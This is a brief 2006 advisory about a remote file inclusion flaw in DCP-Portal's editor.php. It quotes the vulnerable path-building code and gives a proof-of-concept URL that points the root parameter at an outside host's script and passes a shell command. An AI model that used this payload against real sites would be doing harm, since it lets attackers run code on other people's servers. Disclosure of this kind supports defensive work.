[Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML] Jun 13 2006 08:30AM
botan linuxmail org
# Kurdish Security Advisory

# irc.gigachat.net #kurdhack

# http://www.milw0rm.com/exploits/1905

# Editor DHTML Scripting bugz

$url_path_editor = "$root_url/library/editor/";

$abs_path_editor = "$root/library/editor/";

?>

Proof Of Concept

http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.y
ourscripts.com/x.txt?cmd=id

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus